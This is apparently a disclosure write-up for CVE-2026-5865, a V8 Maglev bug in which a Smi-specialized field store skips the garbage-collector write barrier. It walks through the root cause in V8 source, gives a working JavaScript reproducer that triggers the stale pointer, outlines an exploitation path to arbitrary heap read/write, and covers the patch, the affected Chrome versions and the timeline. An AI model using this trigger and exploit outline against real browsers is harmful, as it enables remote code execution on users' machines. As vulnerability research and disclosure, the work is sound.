Summary
CVE-2026-5865 is a Maglev miscompilation bug in V8’s Phi retagging path. A
nested Phi selected as untagged Int32 can be retagged with
Int32ToNumber[kCanonicalizeSmi], which may produce a HeapNumber, while a
later Smi-specialized field store still assumes the value is always a Smi and
emits a no-write-barrier store.
That breaks a core GC invariant: a heap pointer can be written into an object field without notifying the garbage collector. In practice, that stale reference can be reclaimed and replaced, turning a compiler bug into stable V8 exploitation primitives.
Impact & exploitability
This is not just a “wrong type” bug in abstract IR. Once Maglev optimizes a
property store as Smi-only, the generated code can store a freshly allocated
HeapNumber into that field without a barrier when execution later produces a
value outside the Smi range.
The attacker model is remote JavaScript execution in Chrome. A malicious page
can warm the target function up with Smis, trigger Maglev compilation, then
invoke the same code with a boundary value that forces Int32ToNumber to
materialize a heap object.
From there, the bug yields a practical use-after-GC style primitive:
- Attacker model: remote webpage / renderer-context JavaScript
- Primitive: omitted write barrier on a heap object store
- Practical impact: stale
HeapNumberreference, then fake object and address-of primitives - End result: arbitrary memory read/write in the V8 process, and full RCE when chained in a non-sandboxed environment or with a sandbox escape
Root cause
The bug sits in the interaction between Maglev’s Phi representation selection and Smi-specialized field stores.
When an outer Phi stays tagged but takes an input from an inner Phi that was
selected as untagged Int32, EnsurePhiInputsTagged inserts a tagging
conversion on that incoming edge:
void MaglevPhiRepresentationSelector::EnsurePhiInputsTagged(Phi* phi) { const int skip_backedge = phi->is_loop_phi() ? 1 : 0; for (int i = 0; i < phi->input_count() - skip_backedge; i++) { ValueNode* input = phi->input(i).node(); if (Phi* phi_input = input->TryCast<Phi>()) { phi->change_input(i, EnsurePhiTagged(phi_input, phi->predecessor_at(i), BasicBlockPosition::End(), nullptr, i)); } else { DCHECK(input->is_tagged()); } }}Because this path does not pass force_smi, Maglev may emit
Int32ToNumber[kCanonicalizeSmi]. That conversion is not guaranteed to return
a Smi: values outside the Smi range become HeapNumber objects instead.
Later, TryBuildStoreField can still select a Smi-only field store based on
warmup feedback:
if (field_representation.IsSmi()) { RETURN_IF_ABORT(GetAccumulatorSmi(UseReprHintRecording::kDoNotRecord));}
if (field_representation.IsSmi()) { RETURN_IF_ABORT(BuildStoreTaggedFieldNoWriteBarrier( store_target, value, field_index.offset(), store_mode, name));}The intended safety check is GetAccumulatorSmi(), but in this path
BuildCheckSmi() can return early when the value has already been narrowed by
static type information:
ReduceResult MaglevGraphBuilder::BuildCheckSmi( ValueNode* object, bool elidable, AllowWideningSmiToInt32 allow_widening_smi_to_int32) { if (object->StaticTypeIs(broker(), NodeType::kSmi)) return object; // ...}That is unsound here. The tagged alternative produced by
Int32ToNumber[kCanonicalizeSmi] may be a HeapNumber, yet the store still
takes the no-write-barrier path because Maglev trusted the earlier Smi
assumption.
A minimal example from the write-up is:
function f(a, b, x) { let y = a ? x + 1 : 1; let t = y | 0; let z = b ? y : 1; obj.x = z; return obj.x;}If warmup only observes Smis, obj.x = z compiles as a no-write-barrier Smi
store. Calling the optimized function with x = 1073741823 then makes
x + 1 overflow the Smi range, forcing Int32ToNumber[kCanonicalizeSmi] to
allocate a HeapNumber that gets stored without a write barrier.
Reproducer
The trigger is a warmup-then-boundary-value sequence:
function blah(o, a, b, x) { let y; if (a) { y = x + 1; } else { y = 1; }
const t = y | 0;
let z; if (b) { z = y; } else { z = 1; }
o.x = z; return t;}
const obj = { x: 1 };const warmup = { x: 1 };
for (let i = 0; i < 4; i++) gc();
%PrepareFunctionForOptimization(blah);for (let i = 0; i < 2000; i++) { blah(warmup, true, true, i & 1023); blah(warmup, false, true, i & 1023); blah(warmup, true, false, i & 1023);}
%OptimizeMaglevOnNextCall(blah);blah(warmup, true, true, 7);blah(obj, true, true, MAX_SMI);gc({ type: 'major' });The important transition is the last call. Warmup convinces Maglev that the
field store is Smi-only; the final MAX_SMI input forces a HeapNumber
allocation, and the subsequent major GC can reclaim that object even though
the stale pointer remains in obj.x.
Exploit
The public exploit turns the stale HeapNumber reference into a fake object
primitive. After the backing HeapNumber is collected, heap spraying can
reclaim the same memory with controlled array data, so obj.x starts pointing
into attacker-shaped contents.
From there, the write-up bootstraps a fake array object and then stabilizes
addrof/fakeobj by confusing PACKED_DOUBLE_ELEMENTS with
PACKED_ELEMENTS. That is enough to obtain arbitrary V8 heap read/write in
the validation environment.
The full write-up includes the Maglev IR reasoning, the GC invariant break, and the fakeobj/addrof exploitation path.
Patch
The upstream fix hardens BuildCheckSmi() so that a static Smi type hint no
longer suppresses the runtime check when the check is not elidable:
ReduceResult MaglevGraphBuilder::BuildCheckSmi( ValueNode* object, bool elidable, AllowWideningSmiToInt32 allow_widening_smi_to_int32) { if (object->StaticTypeIs(broker(), NodeType::kSmi)) return object; if (object->StaticTypeIs(broker(), NodeType::kSmi) && elidable) return object; // Check for the empty type first so that we catch the case where // GetType(object) is already empty.That change prevents the unsound fast path in the Smi-specialized store case and restores the guarantee that a no-write-barrier field store only happens when the stored value is actually proven to be a Smi.
The fix shipped in Chrome 147.0.7727.55 on Apr 7, 2026.
Mitigation
The real mitigation is to update Chrome. According to the disclosure, the bug was introduced in Chrome 130 and fixed in Chrome 147, so the affected window is Chrome 130 through Chrome 146.
There is no meaningful site-level workaround for end users because the bug is triggered by crafted JavaScript running inside the renderer. If patching is not yet deployed, reducing exposure means limiting use of affected Chrome builds in untrusted browsing contexts until the fixed release is installed.
Timeline & credit
Nebula Security reported the issue to Google on Mar 11, 2026. Google acknowledged the report on Mar 12, 2026, identified the root cause the same day, and shipped the fix on Apr 7, 2026. The public deep-dive followed on May 7, 2026.